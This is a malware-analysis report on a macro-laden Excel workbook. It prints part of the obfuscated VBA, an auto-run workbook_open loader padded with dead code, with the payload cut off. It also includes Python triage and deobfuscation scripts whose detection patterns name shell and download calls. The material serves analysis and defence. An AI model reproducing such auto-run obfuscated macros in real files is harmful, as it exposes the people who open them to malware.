Verdict: MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1204.002 User Execution: Malicious File
The OOXML workbook carries a VBA project whose ThisWorkbook module defines a workbook_open handler, an entry point that runs as soon as the document is opened with macros enabled (VBA procedure names are case-insensitive, so the lowercase spelling fires exactly like Workbook_Open). The handler's only live statement calls into a second module, I7cC; everything else in the decoded source is padding: randomized identifiers, Dim statements that are never referenced, and While a = b ... Wend loops whose two integer literals never match, so their bodies are dead code. The project also contains Shell() and CreateObject calls, which is how a macro runs external commands or scripts. The preview is cut off before the payload logic, so the exact command is not visible, but an auto-exec entry point combined with shell/object-execution tokens and six long base64-like blobs strongly suggests a downloader that fetches and executes a second-stage payload. ClamAV raised no signature hit on either carved artifact, so the verdict rests on the heuristics below.
Heuristics (6)

| Finding | Severity | Rule ID | Description |
|---|---|---|---|
| VBA project inside OOXML | medium | OOXML_VBA | Document contains a VBA project (VBA macros present); 4 related findings |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Workbook_Open macro | high | OLE_VBA_WBOPEN | Workbook_Open macro |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE | One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. |
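The token-based heuristics above can be reproduced with a short scan over the carved artifact. The following is an added example written for this report, not the analyzer's own rule engine: it looks for auto-exec entry points, shell/object/download tokens and long base64-like blobs, and combines an entry point with an execution token the way OLE_VBA_PCODE_AUTOEXEC_EXEC does. The rule IDs are reused from the report for readability; the rule set, the severity mapping, and the SAMPLE_VBA input (the entry point is copied from the preview, the I7cC body is a constructed stand-in for the truncated module, and the blob is generated in place) are this example's assumptions.

```python
"""Static triage of a carved VBA artifact, modelled on the report's heuristics.
Added example; the rule set and severity mapping are assumptions, not the
analyzer's own implementation."""
import base64
import re

# Auto-execution entry points. VBA identifiers are case-insensitive, so the
# sample's lowercase `workbook_open` fires exactly like `Workbook_Open`.
AUTOEXEC_RE = re.compile(
    r"\b(Workbook_Open|Workbook_Activate|Auto_Open|AutoOpen|Document_Open|AutoExec)\b",
    re.IGNORECASE)

# Execution, object-creation and download tokens, keyed by rule ID.
EXEC_RULES = {
    "OLE_VBA_SHELL": re.compile(r"\bShell\s*\(", re.IGNORECASE),
    "OLE_VBA_CREATEOBJ": re.compile(r"\bCreateObject\s*\(", re.IGNORECASE),
    "OLE_VBA_WSCRIPT": re.compile(r"WScript\.Shell", re.IGNORECASE),
    "OLE_VBA_DOWNLOAD": re.compile(
        r"URLDownloadToFile|XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream",
        re.IGNORECASE),
}

# A run of 64 or more base64 characters that does not continue to the left.
BASE64_BLOB_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{64,}={0,2}")


def triage(blob):
    """Scan decoded VBA source (str) or a raw carved stream (bytes).
    Bytes are decoded as latin-1 so the same token search can be run over a
    vbaProject.bin stream when source extraction fails."""
    text = blob.decode("latin-1") if isinstance(blob, bytes) else blob
    findings = {}
    autoexec = sorted({m.lower() for m in AUTOEXEC_RE.findall(text)})
    if autoexec:
        findings["OLE_VBA_AUTOEXEC"] = autoexec
    for rule_id, rx in EXEC_RULES.items():
        hits = len(rx.findall(text))
        if hits:
            findings[rule_id] = hits
    exec_ids = [r for r in EXEC_RULES if r in findings]
    # Entry point plus execution token, the OLE_VBA_PCODE_AUTOEXEC_EXEC idea.
    if autoexec and exec_ids:
        findings["AUTOEXEC_WITH_EXEC"] = exec_ids
    blobs = BASE64_BLOB_RE.findall(text)
    if blobs:
        findings["BASE64_BLOBS"] = len(blobs)
    return findings


def verdict(findings):
    """Collapse findings onto the report's severity scale (assumed mapping)."""
    if "AUTOEXEC_WITH_EXEC" in findings:
        return "critical"
    if any(rule in findings for rule in EXEC_RULES):
        return "high"
    if findings:
        return "medium"
    return "clean"


# Constructed input: the entry point is copied from the report's preview; the
# I7cC body is a stand-in for the truncated module (the report says the macro
# uses CreateObject and the Shell function); the blob is generated right here.
_BLOB = base64.b64encode(b"constructed payload placeholder " * 3).decode()
SAMPLE_VBA = f"""Private Sub workbook_open()
    I7cC.i7NeBwQhFFnZx9NKX_Av
End Sub

Function i7NeBwQhFFnZx9NKX_Av()
    Dim o As Object
    Set o = CreateObject("WScript.Shell")
    Shell ("cmd /c echo constructed")
    payload = "{_BLOB}"
End Function
"""

# Constructed benign macro for comparison.
CLEAN_VBA = "Sub Report()\n    MsgBox \"totals updated\"\nEnd Sub\n"

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("clean", CLEAN_VBA)):
        found = triage(src)
        print(name, verdict(found), found)
```

Two caveats when using a scan like this on real carvings: the base64 regex also fires on any 64-character run of alphanumerics, so long obfuscated identifiers without underscores produce false positives, and tokens inside comments or string literals count the same as live code. Both are acceptable for triage, which is why the report rates the blob finding as "likely" rather than confirmed.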
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 17158 bytes | 2dfc6abb73b33a561504b9b40d2513638e534374fe8f1d6ec1f46f7e659fb984 |

Detection (macros.bas):
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 6 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
I7cC.i7NeBwQhFFnZx9NKX_Av
While 16 = 9114
Dim IVicYSfOFZiOQHEGrBYNE7keyRm4zP1Dd8CLWt_r As Variant
Wend
Dim OBaogWGo3FbUju As Integer
While 6 = 5258
Dim pKtCnFplXzieuR_2t87q8Ce58aI7AswecrQ1bS_8AmmjEAkxj_VdW3 As Variant
Wend
Dim wloxDK6sjoC As Integer
While 17 = 7224
Dim CBBALYZ29oTY5y7yTV_VRFi5nKmN3BQB7gB9hwVj6kXLaLs9FVjVjR As Variant
Wend
Dim t6aFUAuJ97W As Integer
While 15 = 686
Dim RaWv7Og9YZpqVbaanFeZ5ZnvEgaZTxtlayHtULIEBVI2CMDm4iFDbea As Variant
Wend
Dim wjoYxEnkoDN As Integer
While 15 = 3289
Dim gSp_a7YWhPvs1bwetqoH6VP7ufsQ5qhK99fS As Variant
Wend
Dim MdnFCF3j_1 As Integer
While 5 = 8280
Dim w6_j33_4RICrS4LGbzqjt25cQOBhEycp63rvPTwnJDoVPd As Variant
Wend
Dim It35nB2YE5Af As Integer
While 2 = 3152
Dim Qm1axcpUuYJYzFBBXoKhKw_PnJJZwfwwutBIwsOKo4rtibDf_zAZ As Variant
Wend
Dim raSdgivmROhNlVn As Integer
While 23 = 7598
Dim D2MnY_3QDTqJEmZ7dV_SYgkM7k3YTbFKx9aFkV_qhBZL1jfny As Variant
Wend
Dim ksOQTnfP_pwFc6 As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "I7cC"
Dim J2O9OQitV4ajO8Bb8BcnPBz1dRrJQQNFNdTVkFsZI_R9tJZmWG3eGuiHBXd6hXa_oSTtmn1zRBdJr1ER As String
Function jMeVFJRUGUVuWFXVU_Misr13cS5yko(uKyQ_4dX3aIk1Dvhj_ddnGww84KgaQjSl6XbRSaSzFXjfUY4KVOV5dMmXBSEq67jzy94nSNOmJnfrKPlcQU_BMXGruCO_Tk3IwtpUeO2F9sszp4KupkYj1hlZ1)
While 21 = 2867
Dim BSdRHvzXV_O7Ahb82YAWOQ7ArKVsSkrTf_k_iokHX As Variant
Wend
Dim Sx55zm44eEVmoi As Integer
While 11 = 9239
Dim tVbj6YFDuV5Y_6WWKw295bA_2hbxxdUp1Z1qEDorQOBh_Ym7eF3 As Variant
Wend
Dim huomPTWrV7QOOAM As Integer
While 22 = 8560
Dim gh_oQGGIqoZb_a5dRpkv5KwjVrUQu__ufv2D2yxuZ As Variant
Wend
Dim j88z1QPaa9hnNQ As Integer
Dim WpbzoTWRUglL8LYlC_I1DKBSMLEAvCd5NpNZqKgszJZyd6KJfVHCumyJnGkbMUfRBp7P885zaZ_2
While 3 = 1235
Dim UtcRiuzXqon5Rhzlb1zTSLytdYDyRAZFQ As Variant
Wend
Dim cfSWfN9jKPQJ59q As Integer
While 2 = 100
Dim kyepw38H5sxHp_EoMfmxBfM5k1tG5fhhYVMbdsS As Variant
Wend
Dim XeVWmqEQiEjDnQI As Integer
While 13 = 5099
Dim oDjiD5GyLWJOrSvlJcKMRnGjMeiJATb3ON As Variant
Wend
Dim pH24nWPoI_baV7w As Integer
Dim RN5X1vPPgWnpvOE_VdaRiXIYSEQpqsTRmv__rFjzpJ5gRkzv3WbIqJX3Dd_tcjhxCUC_NEPN4kkXclFrNdwROJjbWE5MByVEkEd7hzgwELNEh9YaWVd8vOg1tjlGICLDNdvWFHIX6_KC5d
While 3 = 2496
Dim cXiaD1_6_UhU7x24Q_blltPxx7mcFGvHl As Variant
Wend
Dim Vg53ZJWpL2gEB As Integer
While 4 = 6044
Dim R1Q_IZ3SJrGtmFLex1iXsiO7AzxD6X2r As Variant
Wend
Dim rumuKA7TNQKxvGw As Integer
While 12 = 9144
Dim DIIW_8pQrkTDSlyVuzXB1baSv4MIZWZI3Cs4vA2tAc5I17lrY4Z7WE5krzk As Variant
Wend
Dim tf1TIIIP24jt8nA As Integer
While 5 = 2863
Dim WfPaxQdte7bvvFGJ5Xv_dkj_pwUzdSp8r_gDaWvwNuTV As Variant
Wend
Dim pWVHtsoTKneu6Ou As Integer
While 25 = 9617
Dim A5nOKPcCqiCrgl9urOLRRYKEtnTvDhuGJlu1idHELSoip_FrK3wes7aksh As Variant
Wend
Dim dg5p9Hx4g4 As Integer
While 25 = 8984
Dim FJLFEE9tlXsfljJuNXMJHGA_kJeSetvbL1Dq As Variant
Wend
Dim iXl1azFHuAQ As Integer
Set
... (truncated)

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 49152 bytes | bf04f5505a062ef72114c3c98a6710539388338679ad57ff230efdb01fba4b48 |

Detection (vbaProject_00.bin):
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 6 long base64-like blob(s).
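The padding in the preview follows one mechanical pattern: While a = b ... Wend blocks whose two integer literals are unequal (so the body can never execute) wrapping Dim statements of names that are never used again. Both can be stripped automatically to expose the handful of live statements. The following deobfuscator is an added example written for this report, not part of oletools or the analyzer; its SAMPLE input copies the workbook_open handler from the preview verbatim, while the I7cC module body is a constructed stand-in (the real one is truncated on the page), so the CreateObject line there is an assumption used only to show that referenced declarations survive.

```python
"""Strip constant-false While/Wend blocks and never-referenced Dim statements
from decoded VBA source. Added example; not the analyzer's own tooling."""
import re

# `While 16 = 9114`: a comparison of two integer literals.
DEAD_WHILE_RE = re.compile(r"^\s*While\s+(\d+)\s*=\s*(\d+)\s*$", re.IGNORECASE)
WHILE_RE = re.compile(r"^\s*While\b", re.IGNORECASE)
WEND_RE = re.compile(r"^\s*Wend\s*$", re.IGNORECASE)
# Only the first name of a Dim line is considered (single-name Dims, as in the sample).
DIM_RE = re.compile(r"^\s*Dim\s+([A-Za-z_][A-Za-z0-9_]*)", re.IGNORECASE)
IDENT_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def strip_dead_loops(lines):
    """Remove `While a = b ... Wend` blocks where a and b are unequal integer
    literals: the condition is false before the first iteration, so the body is
    dead code. A true literal comparison (`While 5 = 5`) is an infinite loop,
    not padding, and is left in place."""
    out, i = [], 0
    while i < len(lines):
        m = DEAD_WHILE_RE.match(lines[i])
        if m and int(m.group(1)) != int(m.group(2)):
            depth, i = 1, i + 1
            while i < len(lines) and depth:  # consume up to the matching Wend
                if WHILE_RE.match(lines[i]):
                    depth += 1
                elif WEND_RE.match(lines[i]):
                    depth -= 1
                i += 1
            continue
        out.append(lines[i])
        i += 1
    return out


def strip_unused_dims(lines):
    """Drop `Dim name ...` lines whose name occurs nowhere else in the text.
    Counting is case-insensitive because VBA identifiers are."""
    counts = {}
    for line in lines:
        for ident in IDENT_RE.findall(line):
            counts[ident.lower()] = counts.get(ident.lower(), 0) + 1
    kept = []
    for line in lines:
        m = DIM_RE.match(line)
        if m and counts.get(m.group(1).lower(), 0) == 1:
            continue
        kept.append(line)
    return kept


def deobfuscate(vba_source):
    """Run both passes and return the residual code without blank lines."""
    lines = strip_dead_loops(vba_source.splitlines())
    lines = strip_unused_dims(lines)
    return "\n".join(line for line in lines if line.strip())


# Constructed input. The first routine is copied from the report's preview; the
# I7cC module body is a stand-in for the truncated original, and its
# CreateObject line is an assumption made for this example.
SAMPLE = """Private Sub workbook_open()
I7cC.i7NeBwQhFFnZx9NKX_Av
While 16 = 9114
Dim IVicYSfOFZiOQHEGrBYNE7keyRm4zP1Dd8CLWt_r As Variant
Wend
Dim OBaogWGo3FbUju As Integer
While 6 = 5258
Dim pKtCnFplXzieuR_2t87q8Ce58aI7AswecrQ1bS_8AmmjEAkxj_VdW3 As Variant
Wend
Dim wloxDK6sjoC As Integer
End Sub

Attribute VB_Name = "I7cC"
Function i7NeBwQhFFnZx9NKX_Av()
While 21 = 2867
Dim BSdRHvzXV_O7Ahb82YAWOQ7ArKVsSkrTf_k_iokHX As Variant
Wend
Dim Sx55zm44eEVmoi As Integer
Dim tgt As Object
Set tgt = CreateObject("WScript.Shell")
End Function
"""

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Run the unused-Dim pass over the whole project rather than one module at a time: a module-level variable that is only read from another module would otherwise be counted once and discarded. The dead-loop pass is safe per module, since a While/Wend pair never spans modules.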